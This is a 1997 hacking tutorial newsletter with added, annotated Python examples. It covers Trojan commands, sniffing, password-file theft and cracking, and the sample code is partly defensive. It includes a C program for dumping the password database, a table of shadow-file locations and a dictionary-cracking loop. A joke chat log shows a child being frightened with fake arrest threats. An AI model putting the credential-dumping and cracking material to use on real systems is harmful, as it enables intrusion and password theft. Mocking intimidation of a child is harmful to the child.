Zabu451: PLEASE IL STOP ASKING FOR PASSWORDS FOREVER PLEASE MAKE THEM STOP!!
NewfPyr: I'm sorry, I can't do that. They should be at your house in 5 minutes.
Zabu451: IM SORRY IL DO ANYTHING PLEASE I DONT WANT THEM TO HURT ME
Zabu451: PLEASE
Zabu451: PLEEEEEEEEEEEEEEAAAAAAAAASSSSSSSSE
NewfPyr: They won't hurt you! You'll probably only spend a year of prison.
Zabu451: no IM ONLY A KID
NewfPyr: You are? That makes it different. You won't go to prison for a year.
Zabu451: i thout so
NewfPyr: You'll go for two years.
Zabu451: No! IM SORRY
Zabu451: PLEASE MAKE THEM STOP
Zabu451: PLEASE
[I thought this was enough. He was probably wetting his pants.]
NewfPyr: Since this was a first time offense, I think I can drop charges.
Zabu451: yea
Zabu451: thankyouthankyouthankyou
NewfPyr: The FBI agents have been withdrawn. If you ever do it again, we'll bump you off.
Zabu451: i wont im sorry goodbye
[He promptly signed off.]

One of the RARE RARE occasions that we've actually felt sorry for the hacker. SEVENTY FIVE TOKENS to you, NewfPyr! We're STILL laughing - thanks a lot!
Submitted by: Fran C. M. T. @ aol.com
(Want more of this humor in a jugular vein? Check out http://www.netforward.com/poboxes/?ablang)
*****************************************

Maybe you are too embarrassed to act like a typical AOL social engineering hacker. OK, then maybe you are ready to try the Trojan Horse. This is a type of attack wherein a program that appears to do something legitimate has been altered to attack a computer. For example, on a Unix shell account you might put a Trojan in your home directory named "ls."
Then you tell tech support that there is something funny going on in your home directory. If the tech support guy is sufficiently clueless, he may go into your account while he has root permission. He then gives the command "ls" to see what's there. According to Damien Sorder, "This will only work depending on his 'PATH' statement for his shell. If he searches '.' before '/bin', then it will work. Else, it won't." Note that an empty entry in PATH (a leading or trailing colon, or two colons together) means the current directory just as "." does, so it is the same hole. Presuming the sysadmin has been this careless, and if your Trojan is well written, it will call the real ls program to display your file info -- while also spawning a root shell for your very own use!

***************************************************
Newbie note: if you can get into a root shell you can do anything -- ANYTHING -- to your victim computer. Alas, this means it is surprisingly easy to screw up a Unix system while operating as root. A good systems administrator will give him or herself root privileges only when absolutely necessary to perform a task. Trojans are only one of the many reasons for this caution. Before you invite your friends to hack your box, be prepared for anything, and I mean ANYTHING, to get messed up even by the most well-meaning of friends.
***************************************************

Another attack is to install a sniffer program on an Internet host and grab passwords. What this means is any time you want to log into a computer from another computer by using telnet, your password is at the mercy of any sniffer program that may be installed on any computer through which your password travels, because telnet sends it across the network as plain text. However, to set up a sniffer you must be root on the Unix box on which it is installed. So this attack is clearly not for the beginner.

To get an idea of how many computers "see" your password when you telnet into your remote account, give the command (on a Unix system) of "traceroute my.computer" (it's "tracert" in Windows 95) where you substitute the name of the computer you were planning to log in on for the "my.computer."
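Back to the Trojan "ls" above: whether it ever runs depends entirely on the order of the administrator's PATH, and that is something you can check instead of guess. The example below is added here and is not from the Guide or from Damien Sorder. It simulates the shell's command lookup over a constructed miniature filesystem (the paths and the "victim" account are made up), shows which PATH orders let the planted command win, and produces the cleaned-up PATH a root shell should be using.

```python
import os
import stat

# Constructed miniature filesystem: path -> permission bits. /home/victim/ls is the
# planted Trojan, /bin/ls the real thing.
FAKE_FS = {
    "/bin/ls": 0o755,
    "/usr/bin/ls": 0o755,
    "/home/victim/ls": 0o755,
    "/home/victim/notes.txt": 0o644,
}

SYSTEM_DIRS = ("/bin/", "/usr/bin/", "/sbin/", "/usr/sbin/")


def resolve(cmd, path, cwd, fs=FAKE_FS):
    """The file a shell would execute for `cmd`: first executable match walking PATH
    left to right. "." or an empty entry (a leading, trailing or doubled colon) means
    the current directory, which is the POSIX rule."""
    for entry in path.split(":"):
        directory = cwd if entry in ("", ".") else entry
        candidate = os.path.normpath(os.path.join(directory, cmd))
        mode = fs.get(candidate)
        if mode is not None and mode & stat.S_IXUSR:
            return candidate
    return None


def relative_entries(path):
    """PATH entries resolved against the current directory, with their positions.
    For a root shell the safe answer is an empty list; Damien Sorder's condition,
    '.' searched before /bin, is any entry here that sits in front of /bin."""
    return [(i, entry or "<empty>") for i, entry in enumerate(path.split(":"))
            if entry in ("", ".") or not entry.startswith("/")]


def trojan_wins(path, cwd, cmd="ls", fs=FAKE_FS):
    """True when running `cmd` from `cwd` under this PATH executes something that
    lives outside the system directories."""
    chosen = resolve(cmd, path, cwd, fs)
    return chosen is not None and not chosen.startswith(SYSTEM_DIRS)


def sanitize_path(path):
    """Drop every relative entry and every duplicate, keeping order: the fix for the
    administrator's shell startup files."""
    seen, kept = set(), []
    for entry in path.split(":"):
        if entry.startswith("/") and entry not in seen:
            seen.add(entry)
            kept.append(entry)
    return ":".join(kept)


if __name__ == "__main__":
    for p in (".:/bin:/usr/bin", "/bin:/usr/bin:.", "/usr/local/bin::/bin"):
        print("%-22s runs %-17s trojan wins: %s"
              % (p, resolve("ls", p, "/home/victim"), trojan_wins(p, "/home/victim")))
    print("this process:", relative_entries(os.environ.get("PATH", "")) or "no relative entries")
```

Run it as the account you administer with, and treat any non-empty result from relative_entries as a bug in your startup files, not just a risk to be aware of.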
Sometimes you may discover that when you telnet from one computer to another even within the city you live in, you may go through a dozen or more computers! For example, when I trace a route from an Albuquerque AOL session to my favorite Linux box in Albuquerque, I get:

C:\WINDOWS>tracert fubar.com

Tracing route to fubar.com [208.128.xx.61] over a maximum of 30 hops:

  1   322 ms   328 ms   329 ms  ipt-q1.proxy.aol.com [152.163.205.95]
  2   467 ms   329 ms   329 ms  tot-ta-r5.proxy.aol.com [152.163.205.126]
  3   467 ms   323 ms   328 ms  f4-1.t60-4.Reston.t3.ans.net [207.25.134.69]
  4   467 ms   329 ms   493 ms  h10-1.t56-1.Washington-DC.t3.ans.net [140.223.57.25]
  5   469 ms   382 ms   329 ms  140.222.56.70
  6   426 ms   548 ms   437 ms  core3.Memphis.mci.net [204.70.125.1]
  7   399 ms   448 ms   461 ms  core2-hssi-2.Houston.mci.net [204.70.1.169]
  8   400 ms   466 ms   512 ms  border7-fddi-0.Houston.mci.net [204.70.191.51]
  9   495 ms   493 ms   492 ms  american-comm-svc.Houston.mci.net [204.70.194.86]
 10   522 ms   989 ms   490 ms  webdownlink.foobar.net [208.128.37.98]
 11   468 ms   493 ms   491 ms  208.128.xx.33
 12   551 ms   491 ms   492 ms  fubar.com [208.128.xx.61]

If someone were to put a sniffer on any computer on that route, they could get my password! Now do you want to go telneting around from one of your accounts to another?

A solution to this problem is to use Secure Shell. This is a program you can download for free from http://escert.upc.es/others/ssh/. According to the promotional literature, "Ssh (Secure Shell) is a program to log into another computer over a network, to execute commands in a remote machine, and to move files from one machine to another. It provides strong authentication and secure communications over insecure channels."

If you want to get a password on a computer that you know is being accessed remotely by people using Windows 3.X, and if it is using Trumpet Winsock, and if you can get physical access to that Windows box, there is a super easy way to uncover the password.
You can find the details, which are so easy they will blow your socks off, in the Bugtraq archives. Look for an entry titled "Password problem in Trumpet Winsock." These archives are at http://www.netspace.org/lsv-archive/bugtraq.html

Another way to break into a computer is to get the entire password file. Of course the password file will not hold the passwords themselves. It holds a one-way scrambled ("hashed") version of each one, usually called the encrypted password, which the login program can check a password against but cannot run backwards. But if your target computer doesn't run a program to prevent people from picking easy passwords, it is easy to recover many passwords anyway: you guess, scramble each guess the same way, and compare. But how do you get password files?

A good systems administrator will hide them well so even users on the machine that holds them can't easily obtain the file. The simplest way to get a password file is to steal a backup tape from your victim. This is one reason that most computer breakins are committed by insiders.

But often it is easy to get the entire password file of a LAN remotely from across the Internet. Why should this be so? Think about what happens when you log in. Even before the computer knows who you are, you must be able to command it to compare your user name and password with its password file. What the computer does is perform its encryption operation on the password you enter and then compare it with the encrypted entries in the password file. On old-fashioned Unix systems the file that holds those entries, /etc/passwd, is readable by every user on the machine, because all sorts of programs need the user names, numeric IDs and home directories it also holds. That is why "shadowed" systems move the encrypted passwords out into a second file that only root can read and leave a placeholder in /etc/passwd. Your job as the would-be cracker is to figure out the name of this file and then get your target computer to deliver this file to you.

A tutorial on how to do this, which was published in the ezine K.R.A.C.K (produced by od^pheak), follows. Comments in brackets have been added to the K.R.A.C.K. text.

*********************************************
Strategy For Getting Root With a shadowed Passwd

step#1 anonymous ftp into the server get passwd

[This step will almost never work, but even the simplest attack may be worth a try.]
step #2 To defeat password shadowing on many (but not all) systems, write a program that uses successive calls to getpwent() to obtain the password file. Example:

    #include <stdio.h>
    #include <pwd.h>

    int main(void)
    {
        struct passwd *p;

        /* getpwent() walks the account database one entry at a time */
        while ((p = getpwent()) != NULL)
            printf("%s:%s:%d:%d:%s:%s:%s\n",
                   p->pw_name, p->pw_passwd, (int)p->pw_uid, (int)p->pw_gid,
                   p->pw_gecos, p->pw_dir, p->pw_shell);
        endpwent();
        return 0;
    }

[The listing as originally published was missing its header files and had "=3D", the quoted-printable spelling of "=", in the while condition; both are repaired above. Also note that on a properly shadowed system getpwent() hands an ordinary user only the placeholder ("x" or "*") in pw_passwd, and on most systems it does the same for root, which must use getspent() instead. The trick only works where the C library still reads the real hash out of the shadow file for any caller.]

Or you can look for the unshadowed backup.....

[The following list of likely places to find the unshadowed backup is available from the "Hack FAQ" written by Voyager. It may be obtained from http://www-personal.engin.umich.edu/~jgotts/hack-faq]

Unix                      Path needed                          Token
----------------------------------------------------------------------
AIX 3                     /etc/security/passwd                 !
                          or /tcb/auth/files//
A/UX 3.0s                 /tcb/files/auth/?/                   *
BSD4.3-Reno               /etc/master.passwd                   *
ConvexOS 10               /etc/shadpw                          *
ConvexOS 11               /etc/shadow                          *
DG/UX                     /etc/tcb/aa/user/                    *
EP/IX                     /etc/shadow                          x
HP-UX                     /.secure/etc/passwd                  *
IRIX 5                    /etc/shadow                          x
Linux 1.1                 /etc/shadow                          *
OSF/1                     /etc/passwd[.dir|.pag]               *
SCO Unix #.2.x            /tcb/auth/files//
SunOS4.1+c2               /etc/security/passwd.adjunct         ##username
SunOS 5.0                 /etc/shadow
System V Release 4.0      /etc/shadow                          x
System V Release 4.2      /etc/security/* database
Ultrix 4                  /etc/auth[.dir|.pag]                 *
UNICOS                    /etc/udb

Step #3 crack it

[See below for instructions on how to crack a password file.]
**************************************************

So let's say you have managed to get an encrypted password file. How do you extract the passwords? An example of one of the many programs that can crack poorly chosen passwords is Unix Password Cracker by Scooter Corp. It is available at ftp://ftp.info.bishkek.su/UNIX/crack-2a/crack-2a.tgz or http://iukr.bishkek.su/crack/index.html

A good tutorial on some of the issues of cracking Windows NT passwords may be found at http://ntbugtraq.rc.on.ca/samfaq.htm

One password cracker for Windows NT is L0phtcrack v1.5. It is available for FREE from http://www.L0pht.com (that's a ZERO after the 'L', not an 'o').
It comes with source so you can build it on just about any platform. Authors are mudge@l0pht.com and weld@l0pht.com. Another Windows NT password cracker is Alec Muffett's Crack 5.0 at http://www.sun.rhbnc.ac.uk/~phac107/c50a-nt-0.10.tgz

Even if you crack some passwords, you will still need to correlate passwords with user names. One way to do this is to get a list of users by fingering your target computer. See the GTMHH Vol.1 No.1 for some ways to finger as many users as possible on a system. The VRFY (verify) command in sendmail is another way to get user names. A good systems administrator will turn off both the finger daemon and the sendmail verify command to make it harder for outsiders to break into their computers. If finger and the verify commands are disabled, there is yet another way to get user names. Oftentimes the part of a person's email address that comes before the "@" will also be a user name.

If password cracking doesn't work, there are many -- way too many -- other ways to break into a computer. Following are some suggestions on how to learn these techniques.

1. Learn as much as you can about the computer you have targeted. Find out what operating system it runs; whether it is on a local area network; and what programs it is running. Of special importance are the ports that are open and the daemons running on them.

For example, if you can get physical access to the computer, you can always get control of it one way or another. See the GTMHHs on Windows for many examples. What this means, of course, is that if you have something on your computer you absolutely, positively don't want anyone to read, you had better encrypt it with RSA. Not PGP, RSA. Then you should hope no one discovers a fast way to factor numbers (the mathematical Achilles Heel of RSA and PGP).

If you can't get physical access, your next best bet is if you are on the same LAN.
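To make "Step #3 crack it" from the K.R.A.C.K. excerpt concrete, here is the unshadow-and-crack loop that programs like Crack perform, as an added example that is not from the Guide or from any of the tools it names. Real crackers call crypt(3); so that this runs anywhere, the hash is a toy stand-in with the same two-character-salt shape, and the password and shadow files are constructed with made-up accounts.

```python
import hashlib


def toy_crypt(password, salt):
    """Stand-in for crypt(3): same shape (2-char salt followed by 11 characters) so the
    loop reads like the real thing, but NOT the DES algorithm and no stronger. On a
    system that has it, crypt.crypt(guess, salt) drops in here."""
    digest = hashlib.sha256((salt + password).encode()).hexdigest()
    return salt + digest[:11]


def parse_colon_file(text):
    return [line.split(":") for line in text.splitlines()
            if line.strip() and not line.startswith("#")]


def unshadow(passwd_text, shadow_text):
    """Merge /etc/passwd with /etc/shadow the way root sees the account database: the
    real hash goes back into field two in place of the 'x' placeholder."""
    hashes = {fields[0]: fields[1] for fields in parse_colon_file(shadow_text)}
    merged = []
    for fields in parse_colon_file(passwd_text):
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def mangle(word):
    """The cheap variations users think are clever; Crack's rule set does far more."""
    cap = word.capitalize()
    return (word, cap, word + "1", cap + "1", word + "123", word[::-1])


def crack(entries, wordlist, hashfn=toy_crypt):
    """Dictionary attack: hash each guess with the account's own salt and compare.
    Locked ('*', '!') and still-shadowed ('x') fields are skipped. Returns hits only."""
    found = {}
    for line in entries:
        user, hashed = line.split(":")[:2]
        if hashed in ("", "x") or hashed[0] in "*!":
            continue
        salt = hashed[:2]
        for word in wordlist:
            for guess in mangle(word):
                if hashfn(guess, salt) == hashed:
                    found[user] = guess
                    break
            if user in found:
                break
    return found


# Constructed sample files with made-up accounts. The shadow hashes are generated
# with toy_crypt so the example is self-contained.
PASSWD = """\
root:x:0:0:root:/root:/bin/sh
alice:x:1001:100:Alice Example:/home/alice:/bin/sh
bob:x:1002:100:Bob Example:/home/bob:/bin/sh
carol:x:1003:100:Carol Example:/home/carol:/bin/sh
nobody:x:65534:65534:nobody:/:/bin/false
"""
SHADOW = "\n".join([
    "root:%s:9999:0:99999:7:::" % toy_crypt("r00tMeNot!x9", "Ab"),
    "alice:%s:9999:0:99999:7:::" % toy_crypt("password", "Xy"),
    "bob:%s:9999:0:99999:7:::" % toy_crypt("letmein", "Q7"),
    "carol:%s:9999:0:99999:7:::" % toy_crypt("Qwerty1", "Mz"),
    "nobody:*:9999:0:99999:7:::",
])
WORDLIST = ["123456", "password", "qwerty", "letmein", "abc123", "root"]


if __name__ == "__main__":
    merged = unshadow(PASSWD, SHADOW)
    print("\n".join(merged))
    print("cracked:", crack(merged, WORDLIST))
```

The point to take from the run is not the three weak accounts it finds but the one it doesn't: a password that is not in any wordlist, even after mangling, survives exactly the attack the "program to prevent people from picking easy passwords" mentioned above is there to enforce.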
In fact, the vast majority of computer breakins are done by people who are employees of the company that is running the LAN to which the victim computer is attached. The most common mistake of computer security professionals is to set up a firewall against the outside world while leaving their LAN wide open to insider attack.

Important note: if you have even one Windows 95 box on your LAN, you can't even begin to pretend you have a secure network. That is in large part because it will run in DOS mode, which allows any user to read, write and delete files.

If the computer you have targeted is on the Internet, your next step would be to determine how it is connected to the Internet. The most important issue here is what TCP/IP ports are open and what daemons run on these ports.

***************************************************
Newbie note: A TCP/IP port is a number that tells an Internet host which program an incoming connection is meant for. The programs waiting behind those ports are called "daemons"; they run all the time an Internet host computer is turned on and connected to the Net, waiting for incoming or outgoing data to spur them into action. Well-known services have agreed-upon port numbers, so the port number usually tells you which protocol to expect. An example of a TCP/IP port is number 25, used by SMTP (Simple Mail Transfer Protocol). An example of a daemon that can do interesting things when it gets data under SMTP is sendmail. See the GTMHH on forging email for examples of fun ways to play *legally* with port 25 on other people's computers. For a complete list of commonly used TCP/IP ports, see RFC 1700. One place you can look this up is http://ds2.internic.net/rfc/rfc1700.txt
****************************************************

2. Understand the operating system of the computer you plan to crack. Sure, lots of people who are ignorant of operating systems break into computers by using canned programs against pitifully vulnerable boxes. As one teen hacker told me after returning from Def Con V, "Many of the guys there didn't even know the 'cat' command!" Anyone can break into some computer somewhere if they have no pride or ethics.
We assume you are better than that. If the breakin is so easy you can do it without having a clue what the command "cat" is, you aren't a hacker. You're just a computer vandal.

3. Study the ways other people have broken into computers with that operating system and software. The best archive of breakin techniques for Unix is Bugtraq, http://www.netspace.org/lsv-archive/bugtraq.html. For Windows NT, check out http://ntbugtraq.rc.on.ca/index.html.

A cheap and easy partial shortcut to this arduous learning process is to run a program that scans the ports of your target computer, finds out what daemons are running on each port, and then tells you whether there are breakin techniques known to exist for those daemons. Satan is a good one, and absolutely free. You can download it from ftp://ftp.fc.net/pub/defcon/SATAN/ or a bazillion other hacker ftp sites.

Another great port scanner is Internet Security Scanner. It is offered by Internet Security Systems of Norcross, Georgia USA, 1-800-776-2362. This tool costs lots of money, but is the security scanner of choice of the people who want to keep hackers out. You can reach ISS at http://www.iss.net/.

Internet Security Systems also offers some freebie programs. The "Localhost" Internet Scanner SAFEsuite is set to only run a security scan on the Unix computer on which it is installed (hack your own box!). You can get it from http://www.blanket.com/iss.html. You can get a free beta copy of their scanner for Win NT at http://www.iss.net/about/whatsnew.html#RS_NT.

In theory ISS programs are set so you can only use them at most to probe computer networks that you own. However, a few months ago I got a credible report that a giant company that uses ISS to test its boxes on the Internet backbone accidentally shut down an ISP in El Paso with an ISS automated syn flood attack.

If you want to get a port scanner from a quiet little place, try out http://204.188.52.99.
This offers the Asmodeus Network Security Scanner for Windows NT 4.0.

In most places it is legal to scan the ports of other people's computers. Nevertheless, if you run Satan or any other port scanning tool against computers that you don't have permission to break into, you may get kicked off of your ISP. For example, recently an Irish hacker was running "security audits" of the Emerald Island's ISPs. He was probably doing this in all sincerity. He emailed each of his targets a list of the vulnerabilities he found. But when this freelance security auditor probed the ISP owned by one of my friends, he got that hacker kicked off his ISP.

"But why give him a hard time for just doing security scans? He may have woken up an administrator or two," I asked my friend.

"For the same reason they scramble an F-16 for a bogie," he replied.

The way I get around the problem of getting people mad from port scanning is to do it by hand using a telnet program. Many of the GTMHHs show examples of port scanning by hand. This has the advantage that most systems administrators assume you are merely curious. However, some have a daemon set up so that every time you scan even one port of their boxes, it automatically sends an email to the systems administrator of the ISP you use complaining that you tried to break in -- and another email to you telling you to turn yourself in! The solution to this is to use IP spoofing. But since I'm sure you are only going to try to break into computers where you have permission to do so, you don't need to know how to spoof your IP address.

******************************************************
You may laugh yourself silly warning: If you port scan by hand against obscure.sekurity.org, you may run into some hilarious daemons installed on weird high port numbers.
******************************************************

4.
Now that you know what vulnerable programs are running on your target computer, next you need to decide what program you will use to break in. But aren't hackers brilliant geniuses who discover new ways to break into computers? Yes, some are. But the average hacker relies on programs other hackers have written to do their deeds. That's why, in the book Takedown, some hacker (maybe Kevin Mitnick, maybe not) broke into Tsutomu Shimomura's computer to steal a program to turn a Nokia cell phone into a scanner that could eavesdrop on other people's cell phone calls.

This is where those zillions of hacker web pages come into play. Do a web search for "hacker" and "haxor" and "h4ck3r" etc. You can spend months downloading all those programs with promising names like "IP spoofer."

Unfortunately, you may be in for an ugly surprise or two. This may come as a total shock to you, but some of the people who write programs that are used to break into computers are not exactly Eagle Scouts. For example, the other day a fellow who shall remain nameless wrote to me "I discovered a person has been looting my www dir, where I upload stuff for friends so I am gonna leave a nice little surprise for him in a very cool looking program ;) (if you know what I mean)"

But let's say you download a program that promises to exploit that security hole you just found with a Satan scan. Let's say you aren't going to destroy all your files from some nice little surprise. Your next task may be to get this exploit program to compile and run.

Most computer breakin programs run on Unix. And there are many different flavors of Unix. For each flavor of Unix you can mix or match several different shells. (If none of this makes sense to you, see the GTMHHs on how to get a good shell account.) The problem is that a program written to run in, for example, the csh shell on Solaris Unix may not run from the bash shell on Slackware Linux or the tcsh shell on Irix, etc.
It is also possible that the guy who wrote that breakin program may have a conscience. He or she may have figured that most people would want to use it maliciously. So they made a few little teeny weeny changes to the program, for example commenting out some lines. So Mr./Ms. Tender Conscience can feel that only people who know how to program will be able to use that exploit software. And as we all know, computer programmers would never, ever do something mean and horrible to someone else's computer.

So this brings us to the next thing you should know in order to break into computers.

5. Learn how to program! Even if you use other people's exploit programs, you may need to tweak a thing or two to get them to run. The two most common languages for exploit programs are probably C (or C++) and Perl.

********************************************
Newbie note: If you can't get that program you just downloaded to run, it may be that it is designed to run on the Unix operating system, but you are running Windows. A good tip-off that this may be your problem is a file name that ends with ".gz".
********************************************

So, does all this mean that breaking into computers is really, really hard? Does all this mean that if you break into someone's computer you have proven your digital manhood (or womanhood)? No. Some computers are ridiculously easy to break into. But if you break into a poorly defended computer run by dunces, all you have proven is that you lack good taste and like to get into really stupid kinds of trouble. However, if you manage to break into a computer that is well managed, and that you have permission to test, you are on your way to a high paying career in computer security.

Remember this! If you get busted for breaking into a computer, you are in trouble big time. Even if you say you did no harm. Even if you say you made the computer better while you were prowling around in it.
And your chances of becoming a computer security professional drop almost to zero. And -- do you have any idea of how expensive lawyers are?

I haven't even hinted in this tutorial at how to keep from getting caught. It is at least as hard to cover your tracks as it is to break into a computer. So if you had to read this to learn how to break into computers, you are going to wind up in a world of hurt if you use this to trespass in other people's computers.

So, which way do you plan to go? To be known as a good guy, making tons of money, and having all the hacker fun you can imagine? Or are you going to slink around in the dark, compulsively breaking into strangers' computers, poor, afraid, angry? Busted? Staring at astronomical legal bills?

If you like the rich and happy alternative, check out back issues of the Happy Hacker Digests to see what computers are open to the public to try to crack into. We'll also make new announcements as we discover them. And don't forget to try to crack obscure.sekurity.org. No one has managed to break it when attacking from the outside. I don't have a clue of how to get inside it, either. You may have to discover a new exploit to breach its defenses. But if you do, you will have experienced a thrill that is far greater than breaking into some Lower Slobovian businessman's 386 box running Linux 2.0 with sendmail 4.whatever. Show some chivalry and please don't beat up on the helpless, OK? And stay out of jail or we will all make fun of you when you get caught.

Of course this Guide barely scrapes the surface of breaking into computers. We haven't even touched on topics such as how to look for back doors that other crackers may have hidden on your target computer, or keystroke grabbers, or attacks through malicious code you may encounter while browsing the Web. (Turn off Java on your browser! Never, ever use Internet Explorer.) But maybe some of you ubergenius types reading this could help us out. Hope to hear from you!
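One thing this Guide mentions in passing deserves a closer look from the administrator's chair: the hosts that run a daemon which notices a scan of even one port and mails a complaint. The detection half of such a daemon is simple, and the block below shows it as an added example, not code from the guide. It reads tcp_wrappers (tcpd) style syslog lines, which are constructed samples here using documentation-range addresses, and flags any source that touches several distinct services within a short window. The 60-second window, the four-service threshold and the assumed year 1997 for the year-less syslog timestamps are all assumptions you would tune for your own logs.

```python
"""Detect port-scan behaviour in tcp_wrappers (tcpd) syslog lines: one source
touching many different services within a short window. Added example, not
from the guide; the log lines below are constructed."""
from collections import defaultdict
from datetime import datetime
import re

# Constructed sample log. tcpd writes "<daemon>[pid]: connect from <src>" or
# "refused connect from <src>"; the sendmail line is noise that must be skipped.
SAMPLE_LOG = """\
Jan  5 02:14:01 mail in.telnetd[1201]: connect from 192.0.2.77
Jan  5 02:14:02 mail in.ftpd[1202]: connect from 192.0.2.77
Jan  5 02:14:02 mail in.fingerd[1203]: connect from 192.0.2.77
Jan  5 02:14:03 mail in.rlogind[1204]: refused connect from 192.0.2.77
Jan  5 02:14:04 mail in.rshd[1205]: refused connect from 192.0.2.77
Jan  5 02:14:09 mail sendmail[1300]: starting daemon (constructed, not a tcpd line)
Jan  5 02:30:10 mail in.ftpd[1311]: connect from 198.51.100.5
Jan  5 03:05:00 mail in.telnetd[1402]: connect from 198.51.100.5
"""

TCPD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ (?P<daemon>\S+)\[\d+\]: "
    r"(?:refused )?connect from (?P<src>\S+)$"
)


def parse_tcpd_line(line):
    """Return (timestamp, daemon, source) or None for lines tcpd did not write.
    Syslog omits the year; 1997 is assumed so that timestamps sort correctly."""
    m = TCPD_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"1997 {m.group('ts')}", "%Y %b %d %H:%M:%S")
    return ts, m.group("daemon"), m.group("src")


def detect_scans(lines, window_seconds=60, min_services=4):
    """Map source -> sorted daemons it probed, for every source that reached
    at least min_services distinct daemons inside some window_seconds span."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_tcpd_line(line)
        if parsed:
            ts, daemon, src = parsed
            events[src].append((ts, daemon))
    alerts = {}
    for src, evs in events.items():
        evs.sort()  # oldest first, so every later event is at or after `start`
        for i, (start, _) in enumerate(evs):
            seen = {d for t, d in evs[i:] if (t - start).total_seconds() <= window_seconds}
            if len(seen) >= min_services:
                alerts[src] = sorted(seen)
                break
    return alerts


def admin_notice(alerts):
    """Text an alerting daemon might mail to the local administrator."""
    return "\n".join(f"{src} probed {len(d)} services: {', '.join(d)}"
                     for src, d in sorted(alerts.items()))


if __name__ == "__main__":
    print(admin_notice(detect_scans(SAMPLE_LOG.splitlines())))
```

Two ordinary users hitting ftp and telnet half an hour apart (the 198.51.100.5 lines) stay under the threshold, while the five-service burst from 192.0.2.77 in three seconds is reported; widen the window or lower the threshold and the slow case is caught too, at the price of more false positives from legitimate users.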
____________________________________________________________
Warning! Use this information at your own risk. Get busted for trying this out on some Lower Slobovian businessman's computer and we will all make fun of you, I promise! That goes double for Upper Slobovian boxes!!

Want to see back issues of Guide to (mostly) Harmless Hacking? See http://goodweb.scol.net/hacker/index.html (the official Happy Hacker archive site).

Subscribe to our discussion list by emailing to hacker@techbroker.com with message "subscribe"

Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to list@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Direct flames to dev/null@techbroker.com. Happy hacking!
_____________________________________________________
Copyright 1997 Carolyn P. Meinel. You may forward or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. To subscribe, email hacker@techbroker.com with message "subscribe hh."
________________________________________________________

____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 No. 6
How to Be a Hero in Computer Lab
____________________________________________________________

If you are a student, you know you can get into trouble if you hack your school's computers. But if you can persuade your teachers that you are the good guy who will help protect them from digital vandals, you can become a hero. You may even get their permission to try break-in techniques.
************************************************************
In this Guide you will learn how to:
· Customize the animated logo on Internet Explorer
· Circumvent security programs through Internet Explorer
· Circumvent security programs through any Microsoft Office program
· Circumvent FoolProof
· Circumvent Full Armor
· Solve the web babysitter problem
· Break into absolutely any school computer
· Keep clueless kiddie hackers from messing up your school computer system
************************************************************

This Guide will give you some tips for safely proving just how good you are, and maybe even showing your hacker teacher buddies a thing or two. But I would feel really bad if someone were to use the tips in this Guide to mess up his or her life.

************************************************************
You can mess up your life warning: In most countries kids don't have nearly the legal protections that adults have. If you get involved in a hacker gang at school and you guys get caught, you can easily get expelled from school or even arrested. Even if the authorities don't have very good proof of your guilt. Even if you are innocent. Arghhh!
************************************************************

First task of this Guide, then, is how to find teachers who would love to play hacker games with you and give you free run of the school's computer systems. Whoa, you say, now this is some social engineering challenge! But actually this isn't that hard.

Coyote suggests, "in many cases you may find that if you prove yourself responsible (i.e.: not acting like a jerk in class and not hacking to be cool), it will be easier to gain the trust of the teacher and subsequently gain the job helping with the systems. And once you reach this level you are almost guaranteed that you will know more about system management, and of course hacking, than you could have by simply breaking in."

Here's the first thing you need to remember.
Your teachers are overworked. If they get mad at hackers, it is because computer vandals keep on messing things up. Guess who gets to stay late at work fixing the mess students make when they break into school computers? Right, it's usually your computer lab teachers.

Think about it. Your computer lab teachers might really, really like the idea of having you help with the work. The problem is -- will they dare to trust you?

Karl Schaffarczyk warns, "I nearly got chucked out of school (many years ago) for pulling up a DOS prompt on a system that was protected against such things."

Sheesh, just for getting a DOS prompt? But the problem is that your teachers go to a lot of effort to set school computers up so they can be used to teach classes. The minute they realize you know how to get to DOS, they know you could mess things up so bad they will have to spend a sleepless night -- or two or three -- putting that computer back together. Teachers hate to stay up all night. Imagine that!

So if you really want to work a deal where you become supreme ruler and hero-in-chief of your school's computers, don't start by getting caught! Don't start even by showing your teacher, "Hey, look how easy it is to get a DOS prompt!" Remember, some authorities will immediately kick you out of school or call the cops. Honest, many people are terrified of teenage hackers. You can't really blame them, either, when you consider those news stories. Here are some examples of stories your school authorities have probably read.

- 13 FEBRUARY 1997 Hackers are reported to be using servers at Southampton University to circulate threatening emails (that) ... instruct recipients to cancel credit cards, claiming their security has been breached. (c) VNU Business Publications Limited, 1997 NETWORK NEWS 7/5/97 P39

- A teenager was fined an equivalent of US$350 for paralysing US telephone switchboards...The unnamed teenager made around 60,000 calls... (C) 1997 M2 Communications Ltd.
TELECOMWORLDWIRE 6/5/97

- WORLDCOM in the UK recently suffered a systems failure following a hacker attack... (C) 1997 M2 Communications Ltd. TELECOMWORLDWIRE 6/5/97

Scary, huh? It's not surprising that nowadays some people are so afraid of hackers that they blame almost anything on us. For example, in 1997, authorities at a naval base at first blamed attackers using high-energy radio waves for computer screens that froze. Later investigators learned that ship radars, not hackers, were freezing screens.

So instead of getting mad at teachers who are terrified of hackers, give them a break. The media is inundating them with scare stories. Plus, they have probably spent a lot of time fixing messes made by kiddie hackers. Your job is to show them that you are the good guy. Your job is to show them you can make life better for them by giving you free run of the school computers.

This same basic technique also will work with your ISP. If you offer to help for free, and if you convince them you are responsible, you can get the right to have root (or administrative) access to almost any computer system. For example, I was talking with the owner of an ISP one day, who complained how overworked he was. I told him I knew a high school sophomore who had been busted for hacking but had reformed. This fellow, I promised, would work for free in exchange for the root password on one of his boxes. Next day they did the deal. Now this hacker and his friends get to play break-in games on this computer during off hours when paying customers don't use it. In exchange, those kids fix anything that goes wrong with that box.

So try it. Find an overworked teacher. Or overworked owner of an ISP. Offer to show him or her that you know enough to help take care of those computers. But how do you prove you know enough for the job?
